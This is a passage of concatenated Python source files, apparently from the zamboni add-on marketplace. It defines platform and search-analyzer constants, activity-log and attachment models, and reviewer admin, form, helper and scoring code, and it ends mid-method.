PLATFORMS = {PLATFORM_ANY.id: PLATFORM_ANY, PLATFORM_ALL.id: PLATFORM_ALL,
             PLATFORM_LINUX.id: PLATFORM_LINUX, PLATFORM_MAC.id: PLATFORM_MAC,
             PLATFORM_BSD.id: PLATFORM_BSD, PLATFORM_WIN.id: PLATFORM_WIN,
             PLATFORM_SUN.id: PLATFORM_SUN,
             PLATFORM_ALL_MOBILE.id: PLATFORM_ALL_MOBILE,
             PLATFORM_ANDROID.id: PLATFORM_ANDROID,
             PLATFORM_MAEMO.id: PLATFORM_MAEMO}

# Ordered id -> platform maps for the currently supported platforms.
MOBILE_PLATFORMS = SortedDict([(PLATFORM_ALL_MOBILE.id, PLATFORM_ALL_MOBILE),
                               (PLATFORM_ANDROID.id, PLATFORM_ANDROID),
                               (PLATFORM_MAEMO.id, PLATFORM_MAEMO)])

DESKTOP_PLATFORMS = SortedDict([(PLATFORM_ALL.id, PLATFORM_ALL),
                                (PLATFORM_LINUX.id, PLATFORM_LINUX),
                                (PLATFORM_MAC.id, PLATFORM_MAC),
                                (PLATFORM_WIN.id, PLATFORM_WIN)])

SUPPORTED_PLATFORMS = DESKTOP_PLATFORMS.copy()
SUPPORTED_PLATFORMS.update(MOBILE_PLATFORMS)

# Slug/alias -> platform class lookup, covering historical spellings.
PLATFORM_DICT = {
    'all': PLATFORM_ALL,
    'linux': PLATFORM_LINUX,
    'mac': PLATFORM_MAC,
    'macosx': PLATFORM_MAC,
    'darwin': PLATFORM_MAC,
    'bsd': PLATFORM_BSD,
    'bsd_os': PLATFORM_BSD,
    'freebsd': PLATFORM_BSD,
    'win': PLATFORM_WIN,
    'winnt': PLATFORM_WIN,
    'windows': PLATFORM_WIN,
    'sun': PLATFORM_SUN,
    'sunos': PLATFORM_SUN,
    'solaris': PLATFORM_SUN,
    'mobile': PLATFORM_ALL_MOBILE,
    'android': PLATFORM_ANDROID,
    'maemo': PLATFORM_MAEMO,
}

_platforms = {'desktop': DESKTOP_PLATFORMS, 'mobile': MOBILE_PLATFORMS}
# Replace each app's `platforms` key ('desktop' or 'mobile') with the
# corresponding platform map defined above.
for app in applications.APPS_ALL.values():
    app.platforms = _platforms[app.platforms]
########NEW FILE########
__FILENAME__ = search
# These two dicts are mapping between language codes in zamboni and language
# analyzers in elasticsearch.
#
# Each key value of ANALYZER_MAP is language analyzer supported by
# elasticsearch. See
# http://www.elasticsearch.org/guide/reference/index-modules/analysis/lang-analyzer.html
#
# Each value of ANALYZER_MAP is a list which is supported by the key analyzer.
# All values are picked from AMO_LANGUAGES in settings.py.
#
# The rows commented out are that the language is not supported by
# elasticsearch yet. We should update it when elasticsearch supports new
# analyzer for the language.
# Elasticsearch language analyzer -> list of zamboni language codes it
# handles (codes come from AMO_LANGUAGES in settings.py). Commented rows
# are languages Elasticsearch has no analyzer for yet.
SEARCH_ANALYZER_MAP = {
    # '': ['af'],  # Afrikaans
    'arabic': ['ar'],
    'bulgarian': ['bg'],
    'catalan': ['ca'],
    'czech': ['cs'],
    'danish': ['da'],
    'german': ['de'],
    'greek': ['el'],
    'english': ['en-us'],
    'spanish': ['es'],
    'basque': ['eu'],
    'persian': ['fa'],
    'finnish': ['fi'],
    'french': ['fr'],
    # '': ['ga-ie'],  # Gaelic - Ireland
    # '': ['he'],  # Hebrew
    'hungarian': ['hu'],
    'indonesian': ['id'],
    'italian': ['it'],
    'cjk': ['ja', 'ko'],
    # '': ['mn'],  # Mongolian
    'dutch': ['nl'],
    # Polish requires the Elasticsearch plugin:
    # https://github.com/elasticsearch/elasticsearch-analysis-stempel
    'polish': ['pl'],
    'brazilian': ['pt-br'],
    'portuguese': ['pt-pt'],
    'romanian': ['ro'],
    'russian': ['ru'],
    # '': ['sk'],  # Slovak
    # '': ['sl'],  # Slovenian
    # '': ['sq'],  # Albanian
    'swedish': ['sv-se'],
    # '': ['uk'],  # Ukrainian
    # '': ['vi'],  # Vietnamese
    'chinese': ['zh-cn', 'zh-tw'],
}

# Inverse mapping: language code -> analyzer name.
SEARCH_LANGUAGE_TO_ANALYZER = dict(
    (language, analyzer)
    for analyzer, languages in SEARCH_ANALYZER_MAP.items()
    for language in languages)

# Analyzers that need an Elasticsearch plugin installed. Depending on
# settings.ES_USE_PLUGINS we may disable or bypass these.
SEARCH_ANALYZER_PLUGINS = [
    'polish',
]
# Which stemmer to use for each language.
#
# Note: We use the keys of this dict for supported stop words, also, which is
# specified as, e.g., '_english_'.
STEMMER_MAP = {
    'arabic': 'arabic',
    'basque': 'basque',
    'brazilian': 'brazilian',
    'bulgarian': 'bulgarian',
    'catalan': 'catalan',
    'czech': 'czech',
    'danish': 'danish',
    'dutch': 'dutch',
    'english': 'minimal_english',
    'finnish': 'light_finish',  # Yes, this is misspelled in ES.
    'french': 'light_french',
    'german': 'light_german',
    'greek': 'greek',
    'hungarian': 'light_hungarian',
    'indonesian': 'indonesian',
    'italian': 'light_italian',
    'portuguese': 'light_portuguese',
    'romanian': 'romanian',
    'russian': 'russian',
    'spanish': 'light_spanish',
    'swedish': 'light_swedish',
}
########NEW FILE########
__FILENAME__ = models
import imghdr
import json
import os.path
import string
from copy import copy
from datetime import datetime
from django.conf import settings
from django.core.urlresolvers import reverse
from django.db import models
from django.utils.safestring import mark_safe
import bleach
import commonware.log
import jinja2
from tower import ugettext as _
import amo
import amo.models
from access.models import Group
from addons.models import Addon
from mkt.webapps.models import Webapp
from reviews.models import Review
from tags.models import Tag
from users.helpers import user_link
from users.models import UserProfile
from versions.models import Version
log = commonware.log.getLogger('devhub')
class AppLog(amo.models.ModelBase):
    """
    This table is for indexing the activity log by app.
    """
    # db_constraint=False: no foreign-key constraint at the database level.
    addon = models.ForeignKey(Webapp, db_constraint=False)
    activity_log = models.ForeignKey('ActivityLog')

    class Meta:
        db_table = 'log_activity_app'
        ordering = ('-created',)
class CommentLog(amo.models.ModelBase):
    """
    This table is for indexing the activity log by comment.
    """
    activity_log = models.ForeignKey('ActivityLog')
    comments = models.CharField(max_length=255)

    class Meta:
        db_table = 'log_activity_comment'
        ordering = ('-created',)
class VersionLog(amo.models.ModelBase):
    """
    This table is for indexing the activity log by version.
    """
    activity_log = models.ForeignKey('ActivityLog')
    version = models.ForeignKey(Version)

    class Meta:
        db_table = 'log_activity_version'
        ordering = ('-created',)
class UserLog(amo.models.ModelBase):
    """
    This table is for indexing the activity log by user.

    Note: This includes activity performed unto the user.
    """
    activity_log = models.ForeignKey('ActivityLog')
    user = models.ForeignKey(UserProfile)

    class Meta:
        db_table = 'log_activity_user'
        ordering = ('-created',)
class GroupLog(amo.models.ModelBase):
    """
    This table is for indexing the activity log by access group.
    """
    activity_log = models.ForeignKey('ActivityLog')
    group = models.ForeignKey(Group)

    class Meta:
        db_table = 'log_activity_group'
        ordering = ('-created',)
class ActivityLogManager(amo.models.ManagerBase):
    """Query helpers for ActivityLog, filtered through its index tables
    (AppLog, VersionLog, UserLog, GroupLog)."""

    def for_apps(self, apps):
        """Return log entries for one Webapp or an iterable of Webapps."""
        if isinstance(apps, Webapp):
            apps = (apps,)
        vals = (AppLog.objects.filter(addon__in=apps)
                .values_list('activity_log', flat=True))
        if vals:
            return self.filter(pk__in=list(vals))
        else:
            return self.none()

    def for_version(self, version):
        """Return log entries indexed against `version`."""
        vals = (VersionLog.objects.filter(version=version)
                .values_list('activity_log', flat=True))
        return self.filter(pk__in=list(vals))

    def for_group(self, group):
        """Return log entries indexed against an access group."""
        return self.filter(grouplog__group=group)

    def for_user(self, user):
        """Return log entries indexed against `user`."""
        vals = (UserLog.objects.filter(user=user)
                .values_list('activity_log', flat=True))
        return self.filter(pk__in=list(vals))

    def for_developer(self):
        """Entries visible to developers: exclude admin and hidden actions."""
        return self.exclude(action__in=amo.LOG_ADMINS + amo.LOG_HIDE_DEVELOPER)

    def admin_events(self):
        return self.filter(action__in=amo.LOG_ADMINS)

    def editor_events(self):
        return self.filter(action__in=amo.LOG_EDITORS)

    def review_queue(self, webapp=False):
        """Review-queue actions, excluding those made by the task user."""
        qs = self._by_type(webapp)
        return (qs.filter(action__in=amo.LOG_REVIEW_QUEUE)
                .exclude(user__id=settings.TASK_USER_ID))

    def total_reviews(self, webapp=False):
        """Return the top users, and their # of reviews."""
        # Fix: this docstring used to sit *after* the first statement,
        # where it was a no-op string expression instead of a docstring.
        qs = self._by_type(webapp)
        return (qs.values('user', 'user__display_name', 'user__username')
                .filter(action__in=amo.LOG_REVIEW_QUEUE)
                .exclude(user__id=settings.TASK_USER_ID)
                .annotate(approval_count=models.Count('id'))
                .order_by('-approval_count'))

    def monthly_reviews(self, webapp=False):
        """Return the top users for the month, and their # of reviews."""
        qs = self._by_type(webapp)
        now = datetime.now()
        created_date = datetime(now.year, now.month, 1)
        return (qs.values('user', 'user__display_name', 'user__username')
                .filter(created__gte=created_date,
                        action__in=amo.LOG_REVIEW_QUEUE)
                .exclude(user__id=settings.TASK_USER_ID)
                .annotate(approval_count=models.Count('id'))
                .order_by('-approval_count'))

    def user_position(self, values_qs, user):
        """1-based rank of `user` within a ranked values queryset, or None."""
        try:
            return next(i for (i, d) in enumerate(list(values_qs))
                        if d.get('user') == user.id) + 1
        except StopIteration:
            return None

    def total_reviews_user_position(self, user, webapp=False):
        return self.user_position(self.total_reviews(webapp), user)

    def monthly_reviews_user_position(self, user, webapp=False):
        return self.user_position(self.monthly_reviews(webapp), user)

    def _by_type(self, webapp=False):
        # Restrict to entries that have an app index row (log_activity_app).
        qs = super(ActivityLogManager, self).get_query_set()
        return qs.extra(
            tables=['log_activity_app'],
            where=['log_activity_app.activity_log_id=log_activity.id'])
class SafeFormatter(string.Formatter):
    """A replacement for str.format that escapes interpolated values."""

    def get_field(self, *args, **kw):
        # obj is the value getting interpolated into the string.
        obj, used_key = super(SafeFormatter, self).get_field(*args, **kw)
        # Escape via jinja2 so interpolated values can't inject markup.
        return jinja2.escape(obj), used_key
class ActivityLog(amo.models.ModelBase):
    """A single activity-log entry.

    Arguments and details are stored as JSON in `_arguments`/`_details`
    and exposed through the `arguments`/`details` properties.
    """
    # (action id, action name) choices, sorted by id.
    TYPES = sorted([(value.id, key) for key, value in amo.LOG.items()])
    user = models.ForeignKey('users.UserProfile', null=True)
    action = models.SmallIntegerField(choices=TYPES, db_index=True)
    _arguments = models.TextField(blank=True, db_column='arguments')
    _details = models.TextField(blank=True, db_column='details')
    objects = ActivityLogManager()
    formatter = SafeFormatter()

    class Meta:
        db_table = 'log_activity'
        ordering = ('-created',)

    def f(self, *args, **kw):
        """Calls SafeFormatter.format and returns a Markup string."""
        # SafeFormatter escapes everything so this is safe.
        return jinja2.Markup(self.formatter.format(*args, **kw))

    @property
    def arguments(self):
        """Deserialize `_arguments` into a list of model instances and
        primitives, or None if the stored JSON is unreadable.

        Note: recomputed (JSON parse + DB queries) on every access.
        """
        try:
            # d is a structure:
            # ``d = [{'addons.addon':12}, {'addons.addon':1}, ... ]``
            d = json.loads(self._arguments)
        except Exception:
            # Fix: was a bare `except:`, which also swallowed
            # KeyboardInterrupt/SystemExit.
            log.debug('unserializing data from addon_log failed: %s' % self.id)
            return None
        objs = []
        for item in d:
            # item has only one element.
            model_name, pk = item.items()[0]
            if model_name in ('str', 'int', 'null'):
                objs.append(pk)
            else:
                (app_label, model_name) = model_name.split('.')
                model = models.loading.get_model(app_label, model_name)
                # Cope with soft deleted models.
                if hasattr(model, 'with_deleted'):
                    objs.extend(model.with_deleted.filter(pk=pk))
                else:
                    objs.extend(model.objects.filter(pk=pk))
        return objs

    @arguments.setter
    def arguments(self, args=None):
        """
        Takes an object or a tuple of objects and serializes them and stores it
        in the db as a json string.
        """
        # Fix: default was a mutable `[]`; the body already normalizes None.
        if args is None:
            args = []
        if not isinstance(args, (list, tuple)):
            args = (args,)
        serialize_me = []
        for arg in args:
            if isinstance(arg, basestring):
                serialize_me.append({'str': arg})
            elif isinstance(arg, (int, long)):
                serialize_me.append({'int': arg})
            elif isinstance(arg, tuple):
                # Instead of passing an addon instance you can pass a tuple:
                # (Addon, 3) for Addon with pk=3
                serialize_me.append(dict(((unicode(arg[0]._meta), arg[1]),)))
            else:
                serialize_me.append(dict(((unicode(arg._meta), arg.pk),)))
        self._arguments = json.dumps(serialize_me)

    @property
    def details(self):
        # Returns None when `_details` is empty.
        if self._details:
            return json.loads(self._details)

    @details.setter
    def details(self, data):
        self._details = json.dumps(data)

    @property
    def log(self):
        """The amo.LOG constant for this entry's action."""
        return amo.LOG_BY_ID[self.action]

    def to_string(self, type_=None):
        """Render this entry as an escaped Markup string.

        Uses the log type's '<type_>_format' template when it exists,
        otherwise the default `format` template.
        """
        log_type = amo.LOG_BY_ID[self.action]
        if type_ and hasattr(log_type, '%s_format' % type_):
            format = getattr(log_type, '%s_format' % type_)
        else:
            format = log_type.format
        # We need to copy arguments so we can remove elements from it
        # while we loop over self.arguments.
        arguments = copy(self.arguments)
        addon = None
        review = None
        version = None
        collection = None
        tag = None
        group = None
        for arg in self.arguments:
            if isinstance(arg, Addon) and not addon:
                addon = self.f(u'<a href="{0}">{1}</a>',
                               arg.get_url_path(), arg.name)
                arguments.remove(arg)
            if isinstance(arg, Review) and not review:
                review = self.f(u'<a href="{0}">{1}</a>',
                                arg.get_url_path(), _('Review'))
                arguments.remove(arg)
            if isinstance(arg, Version) and not version:
                text = _('Version {0}')
                version = self.f(text, arg.version)
                arguments.remove(arg)
            if isinstance(arg, Tag) and not tag:
                # NOTE(review): unlike the other branches, the matched tag
                # is not removed from `arguments` -- confirm whether that
                # is intentional before changing it.
                if arg.can_reverse():
                    tag = self.f(u'<a href="{0}">{1}</a>',
                                 arg.get_url_path(), arg.tag_text)
                else:
                    tag = self.f('{0}', arg.tag_text)
            if isinstance(arg, Group) and not group:
                group = arg.name
                arguments.remove(arg)
        user = user_link(self.user)
        try:
            kw = dict(addon=addon, review=review, version=version,
                      collection=collection, tag=tag, user=user, group=group)
            return self.f(format, *arguments, **kw)
        except (AttributeError, KeyError, IndexError):
            log.warning('%d contains garbage data' % (self.id or 0))
            return 'Something magical happened.'

    def __unicode__(self):
        return self.to_string()

    def __html__(self):
        return self
# TODO: remove once we migrate to CommAtttachment (ngoke).
class ActivityLogAttachment(amo.models.ModelBase):
    """
    Model for an attachment to an ActivityLog instance. Used by the Marketplace
    reviewer tools, where reviewers can attach files to comments made during
    the review process.
    """
    activity_log = models.ForeignKey('ActivityLog')
    filepath = models.CharField(max_length=255)
    description = models.CharField(max_length=255, blank=True)
    mimetype = models.CharField(max_length=255, blank=True)

    class Meta:
        db_table = 'log_activity_attachment'
        ordering = ('id',)

    def get_absolute_url(self):
        """URL of the reviewer-tools view that serves this attachment."""
        return reverse('reviewers.apps.review.attachment', args=[self.pk])

    def filename(self):
        """The attachment's bare file name (no directory components)."""
        return os.path.basename(self.filepath)

    def full_path(self):
        """Absolute filesystem path of the attachment."""
        return os.path.join(settings.REVIEWER_ATTACHMENTS_PATH, self.filepath)

    def display_name(self):
        """Front-end label: the description when set, else the file name."""
        label = self.description or self.filename()
        return mark_safe(bleach.clean(label))

    def is_image(self):
        """Whether the attached file is an image format that the stdlib
        imghdr module recognizes."""
        return imghdr.what(self.full_path()) is not None
########NEW FILE########
__FILENAME__ = admin
from django.contrib import admin
from translations.helpers import truncate
from .models import CannedResponse, EventLog, ReviewerScore
class CannedResponseAdmin(admin.ModelAdmin):
    # list_display callable: show the response truncated to 50 characters.
    def truncate_response(obj):
        return truncate(obj.response, 50)
    truncate_response.short_description = 'Response'

    list_display = ('name', truncate_response)
    list_filter = ('type',)
class EventLogAdmin(admin.ModelAdmin):
    list_display = ('created', 'type', 'action', 'field', 'user',
                    'changed_id', 'added', 'removed', 'notes')
    list_filter = ('type', 'action')
    # The log is read-only from the admin: every displayed field is frozen.
    readonly_fields = list_display
    date_hierarchy = 'created'
    raw_id_fields = ('user',)

    def has_add_permission(self, request):
        # Disallow creating entries through the admin.
        return False

    def has_delete_permission(self, request, obj=None):
        # Disallow deleting entries through the admin.
        return False
class ReviewerScoreAdmin(admin.ModelAdmin):
    list_display = ('user', 'score', 'note_key', 'note', 'created')
    # Raw-id widgets avoid loading every user/addon into a dropdown.
    raw_id_fields = ('user', 'addon')
    fieldsets = (
        (None, {
            'fields': ('user', 'addon', 'score', 'note'),
        }),
    )
    list_filter = ('note_key',)
# Hook the editor-related models up to the Django admin.
admin.site.register(CannedResponse, CannedResponseAdmin)
admin.site.register(EventLog, EventLogAdmin)
admin.site.register(ReviewerScore, ReviewerScoreAdmin)
########NEW FILE########
__FILENAME__ = forms
import logging
from datetime import timedelta
from django import forms
from django.forms import widgets
import happyforms
from tower import ugettext as _, ugettext_lazy as _lazy
log = logging.getLogger('z.reviewers.forms')
class ReviewLogForm(happyforms.Form):
    """Date-range and free-text filter for the review log page."""
    start = forms.DateField(required=False,
                            label=_lazy(u'View entries between'))
    end = forms.DateField(required=False, label=_lazy(u'and'))
    search = forms.CharField(required=False, label=_lazy(u'containing'))

    def __init__(self, *args, **kw):
        super(ReviewLogForm, self).__init__(*args, **kw)
        widget_attrs = {
            # L10n: start, as in "start date"
            'start': {'placeholder': _('start'), 'size': 10},
            # L10n: end, as in "end date"
            'end': {'placeholder': _('end'), 'size': 10},
            # L10n: Description of what can be searched for
            'search': {'placeholder': _('add-on, editor or comment'),
                       'size': 30},
        }
        for name, attrs in widget_attrs.items():
            self.fields[name].widget.attrs = attrs

    def clean(self):
        data = self.cleaned_data
        # We want this to be inclusive of the end date.
        if data.get('end'):
            data['end'] += timedelta(days=1)
        return data
class NonValidatingChoiceField(forms.ChoiceField):
    """A ChoiceField that doesn't validate."""
    def validate(self, value):
        # Intentionally skip ChoiceField's choice validation.
        pass
class MOTDForm(happyforms.Form):
    """Form for editing the message of the day (MOTD)."""
    motd = forms.CharField(required=True, widget=widgets.Textarea())
########NEW FILE########
__FILENAME__ = helpers
import datetime
import math
from django.db import connection
import jinja2
from django.conf import settings
from jingo import register
from tower import ugettext as _
import amo
from addons.helpers import new_context
from editors.models import EscalationQueue, ReviewerScore
from versions.models import Version
@register.function
def file_compare(file_obj, version):
    # Returns the first file of `version` to compare against.
    # NOTE(review): `file_obj` is currently unused -- confirm whether
    # platform matching was intentionally dropped here.
    return version.files.all()[0]
@register.function
def file_review_status(addon, file):
    """Return a localized, human-readable review status for `file`."""
    if file.status not in (amo.STATUS_DISABLED, amo.STATUS_REJECTED):
        return amo.STATUS_CHOICES[file.status]
    # Can't assume that a missing reviewed date means unreviewed,
    # especially for versions -- so only claim "Rejected" when we have one.
    if file.reviewed is not None:
        return _(u'Rejected')
    return _(u'Rejected or Unreviewed')
@register.function
def version_status(addon, version):
    # version.status is a sequence; render it as a comma-separated string.
    return ','.join(unicode(s) for s in version.status)
@register.inclusion_tag('editors/includes/reviewers_score_bar.html')
@jinja2.contextfunction
def reviewers_score_bar(context, types=None, addon_type=None):
    """Render the reviewer score bar (recent points, total, leaderboards)
    for the current user."""
    user = context.get('amo_user')
    return new_context(dict(
        request=context.get('request'),
        amo=amo, settings=settings,
        points=ReviewerScore.get_recent(user, addon_type=addon_type),
        total=ReviewerScore.get_total(user),
        **ReviewerScore.get_leaderboards(user, types=types,
                                         addon_type=addon_type)))
def get_avg_app_waiting_time():
    """
    Returns the rolling average from the past 30 days of the time taken for a
    pending app to become public.

    Returns 0 (days) when no app was reviewed in the window.
    """
    cursor = connection.cursor()
    cursor.execute('''
        SELECT AVG(DATEDIFF(reviewed, nomination)) FROM versions
        RIGHT JOIN addons ON versions.addon_id = addons.id
        WHERE addontype_id = %s AND status = %s AND
              reviewed >= DATE_SUB(NOW(), INTERVAL 30 DAY)
        ''', (amo.ADDON_WEBAPP, amo.STATUS_PUBLIC))
    row = cursor.fetchone()
    days = 0
    if row:
        try:
            days = math.ceil(float(row[0]))
        except TypeError:
            # AVG() returned NULL (row[0] is None): keep days at 0.
            pass
    return days
@register.function
def get_position(addon):
    """Return review-queue position info for a pending app.

    Returns a dict with keys 'days' (estimated days of waiting left),
    'days_in_queue' (days already spent in the queue), 'pos' (1-based
    position, 0 if not in the queue) and 'total' (queue length).
    """
    excluded_ids = EscalationQueue.objects.values_list('addon', flat=True)
    # Look at all regular versions of webapps which have pending files.
    # This includes both new apps and updates to existing apps, to combine
    # both the regular and updates queue in one big list (In theory, it
    # should take the same time for reviewers to process an app in either
    # queue). Escalated apps are excluded just like in reviewer tools.
    qs = (Version.objects.filter(addon__type=amo.ADDON_WEBAPP,
                                 addon__disabled_by_user=False,
                                 files__status=amo.STATUS_PENDING,
                                 deleted=False)
          .exclude(addon__status__in=(amo.STATUS_DISABLED,
                                      amo.STATUS_DELETED, amo.STATUS_NULL))
          .exclude(addon__id__in=excluded_ids)
          .order_by('nomination', 'created').select_related('addon')
          .no_transforms().values_list('addon_id', 'nomination'))
    # Materialize once so one result set serves both the position scan and
    # the total (the original issued a second COUNT query via qs.count()).
    rows = list(qs)
    position = 0
    nomination_date = None
    for idx, (addon_id, nomination) in enumerate(rows, start=1):
        if addon_id == addon.id:
            position = idx
            nomination_date = nomination
            break
    total = len(rows)
    days = 1
    days_in_queue = 0
    if nomination_date:
        # Estimated waiting time is calculated from the rolling average of
        # the queue waiting time in the past 30 days but subtracting from
        # it the number of days this app has already spent in the queue.
        days_in_queue = (datetime.datetime.now() - nomination_date).days
        days = max(get_avg_app_waiting_time() - days_in_queue, days)
    return {'days': int(days), 'days_in_queue': int(days_in_queue),
            'pos': position, 'total': total}
########NEW FILE########
__FILENAME__ = models
import datetime
from django.core.cache import cache
from django.db import models
from django.db.models import Sum
import commonware.log
import amo
import amo.models
from access.models import Group
from addons.models import Addon
from amo.utils import cache_ns_key
from devhub.models import ActivityLog
from translations.fields import save_signal, TranslatedField
from users.models import UserProfile
user_log = commonware.log.getLogger('z.users')
class CannedResponse(amo.models.ModelBase):
    """A pre-written reviewer response, grouped and typed for display."""
    name = TranslatedField()
    # short=False: the response body may be long text.
    response = TranslatedField(short=False)
    sort_group = models.CharField(max_length=255)
    type = models.PositiveIntegerField(
        choices=amo.CANNED_RESPONSE_CHOICES.items(), db_index=True, default=0)

    class Meta:
        db_table = 'cannedresponses'

    def __unicode__(self):
        return unicode(self.name)
# Hook translation saving into CannedResponse's pre_save signal.
models.signals.pre_save.connect(save_signal, sender=CannedResponse,
                                dispatch_uid='cannedresponses_translations')
class EventLog(models.Model):
    """Generic editor event log: who changed what, with before/after values."""
    type = models.CharField(max_length=60)
    action = models.CharField(max_length=120)
    field = models.CharField(max_length=60, blank=True)
    user = models.ForeignKey(UserProfile)
    changed_id = models.IntegerField()
    added = models.CharField(max_length=765, blank=True)
    removed = models.CharField(max_length=765, blank=True)
    notes = models.TextField(blank=True)
    created = models.DateTimeField(auto_now_add=True)

    class Meta:
        db_table = u'eventlog'

    @staticmethod
    def new_editors():
        """Return the five most recent additions to the Add-on Reviewers
        group as [{'user': ..., 'created': ...}, ...]."""
        action = amo.LOG.GROUP_USER_ADDED
        group = Group.objects.get(name='Add-on Reviewers')
        items = (ActivityLog.objects.for_group(group)
                 .filter(action=action.id)
                 .order_by('-created')[:5])
        # arguments[1] is presumably the user added to the group -- the
        # group itself being arguments[0].
        return [dict(user=i.arguments[1],
                     created=i.created)
                for i in items]
class EditorSubscription(amo.models.ModelBase):
    """Links an editor (user) to an addon they are subscribed to."""
    user = models.ForeignKey(UserProfile)
    addon = models.ForeignKey(Addon)

    class Meta:
        db_table = 'editor_subscriptions'
class ReviewerScore(amo.models.ModelBase):
    """Points awarded to reviewers for review work, plus the cached
    totals/leaderboards computed from them."""
    user = models.ForeignKey(UserProfile, related_name='_reviewer_scores')
    addon = models.ForeignKey(Addon, blank=True, null=True, related_name='+')
    score = models.SmallIntegerField()
    # For automated point rewards.
    note_key = models.SmallIntegerField(choices=amo.REVIEWED_CHOICES.items(),
                                        default=0)
    # For manual point rewards with a note.
    note = models.CharField(max_length=255)

    class Meta:
        db_table = 'reviewer_scores'
        ordering = ('-created',)

    @classmethod
    def get_key(cls, key=None, invalidate=False):
        """Build a namespaced cache key, or (with no `key`) invalidate the
        whole namespace."""
        namespace = 'riscore'
        if not key:  # Assuming we're invalidating the namespace.
            cache_ns_key(namespace, invalidate)
            return
        else:
            # Using cache_ns_key so each cache val is invalidated together.
            ns_key = cache_ns_key(namespace, invalidate)
            return '%s:%s' % (ns_key, key)

    @classmethod
    def get_event(cls, addon, status, **kwargs):
        """Return the review event type constant.

        This is determined by the addon.type and the queue the addon is
        currently in (which is determined from the status).

        Note: We're not using addon.status because this is called after the
        status has been updated by the reviewer action.
        """
        queue = ''
        if status in [amo.STATUS_UNREVIEWED, amo.STATUS_LITE]:
            queue = 'PRELIM'
        elif status in [amo.STATUS_NOMINATED, amo.STATUS_LITE_AND_NOMINATED]:
            queue = 'FULL'
        elif status == amo.STATUS_PUBLIC:
            queue = 'UPDATE'
        if (addon.type in [amo.ADDON_EXTENSION, amo.ADDON_PLUGIN,
                           amo.ADDON_API] and queue):
            return getattr(amo, 'REVIEWED_ADDON_%s' % queue)
        elif addon.type == amo.ADDON_DICT and queue:
            return getattr(amo, 'REVIEWED_DICT_%s' % queue)
        elif addon.type in [amo.ADDON_LPAPP, amo.ADDON_LPADDON] and queue:
            return getattr(amo, 'REVIEWED_LP_%s' % queue)
        elif addon.type == amo.ADDON_PERSONA:
            return amo.REVIEWED_PERSONA
        elif addon.type == amo.ADDON_SEARCH and queue:
            return getattr(amo, 'REVIEWED_SEARCH_%s' % queue)
        elif addon.type == amo.ADDON_THEME and queue:
            return getattr(amo, 'REVIEWED_THEME_%s' % queue)
        elif addon.type == amo.ADDON_WEBAPP:
            if addon.is_packaged:
                if status == amo.STATUS_PUBLIC:
                    return amo.REVIEWED_WEBAPP_UPDATE
                else:  # If it's not PUBLIC, assume it's a new submission.
                    return amo.REVIEWED_WEBAPP_PACKAGED
            else:  # It's a hosted app.
                in_rereview = kwargs.pop('in_rereview', False)
                if status == amo.STATUS_PUBLIC and in_rereview:
                    return amo.REVIEWED_WEBAPP_REREVIEW
                else:
                    return amo.REVIEWED_WEBAPP_HOSTED
        else:
            return None

    @classmethod
    def award_points(cls, user, addon, status, **kwargs):
        """Awards points to user based on an event and the queue.

        `event` is one of the `REVIEWED_` keys in constants.
        `status` is one of the `STATUS_` keys in constants.
        """
        event = cls.get_event(addon, status, **kwargs)
        score = amo.REVIEWED_SCORES.get(event)
        if score:
            cls.objects.create(user=user, addon=addon, score=score,
                               note_key=event)
            cls.get_key(invalidate=True)
            user_log.info(
                (u'Awarding %s points to user %s for "%s" for addon %s'
                 % (score, user, amo.REVIEWED_CHOICES[event], addon.id))
                .encode('utf-8'))
        return score

    @classmethod
    def award_moderation_points(cls, user, addon, review_id):
        """Awards points to user based on moderated review."""
        event = amo.REVIEWED_ADDON_REVIEW
        if addon.type == amo.ADDON_WEBAPP:
            event = amo.REVIEWED_APP_REVIEW
        score = amo.REVIEWED_SCORES.get(event)
        cls.objects.create(user=user, addon=addon, score=score, note_key=event)
        cls.get_key(invalidate=True)
        user_log.info(
            u'Awarding %s points to user %s for "%s" for review %s' % (
                score, user, amo.REVIEWED_CHOICES[event], review_id))

    @classmethod
    def get_total(cls, user):
        """Returns total points by user."""
        key = cls.get_key('get_total:%s' % user.id)
        val = cache.get(key)
        if val is not None:
            return val
        val = (ReviewerScore.objects.no_cache().filter(user=user)
               .aggregate(total=Sum('score'))
               .values())[0]
        if val is None:
            val = 0
        cache.set(key, val, None)
        return val

    @classmethod
    def get_recent(cls, user, limit=5, addon_type=None):
        """Returns most recent ReviewerScore records."""
        # Fix: include addon_type in the cache key; previously a filtered
        # and an unfiltered call could serve each other's cached value.
        key = cls.get_key('get_recent:%s:%s' % (user.id, addon_type))
        val = cache.get(key)
        if val is not None:
            return val
        val = ReviewerScore.objects.no_cache().filter(user=user)
        if addon_type is not None:
            # Fix: filter() returns a new queryset; the result used to be
            # discarded, silently ignoring addon_type.
            val = val.filter(addon__type=addon_type)
        val = list(val[:limit])
        cache.set(key, val, None)
        return val

    @classmethod
    def get_breakdown(cls, user):
        """Returns points broken down by addon type."""
        key = cls.get_key('get_breakdown:%s' % user.id)
        val = cache.get(key)
        if val is not None:
            return val
        sql = """
            SELECT `reviewer_scores`.*,
                   SUM(`reviewer_scores`.`score`) AS `total`,
                   `addons`.`addontype_id` AS `atype`
            FROM `reviewer_scores`
            LEFT JOIN `addons` ON (`reviewer_scores`.`addon_id`=`addons`.`id`)
            WHERE `reviewer_scores`.`user_id` = %s
            GROUP BY `addons`.`addontype_id`
            ORDER BY `total` DESC
        """
        with amo.models.skip_cache():
            val = list(ReviewerScore.objects.raw(sql, [user.id]))
        cache.set(key, val, None)
        return val

    @classmethod
    def get_breakdown_since(cls, user, since):
        """
        Returns points broken down by addon type since the given datetime.
        """
        key = cls.get_key('get_breakdown:%s:%s' % (user.id, since.isoformat()))
        val = cache.get(key)
        if val is not None:
            return val
        sql = """
            SELECT `reviewer_scores`.*,
                   SUM(`reviewer_scores`.`score`) AS `total`,
                   `addons`.`addontype_id` AS `atype`
            FROM `reviewer_scores`
            LEFT JOIN `addons` ON (`reviewer_scores`.`addon_id`=`addons`.`id`)
            WHERE `reviewer_scores`.`user_id` = %s AND
                  `reviewer_scores`.`created` >= %s
            GROUP BY `addons`.`addontype_id`
            ORDER BY `total` DESC
        """
        with amo.models.skip_cache():
            val = list(ReviewerScore.objects.raw(sql, [user.id, since]))
        # Time-bounded breakdowns go stale, so expire them after an hour.
        cache.set(key, val, 3600)
        return val

    @classmethod
    def _leaderboard_query(cls, since=None, types=None, addon_type=None):
        """
        Returns common SQL to leaderboard calls.
        """
        query = (cls.objects
                 .values_list('user__id', 'user__display_name')
                 .annotate(total=Sum('score'))
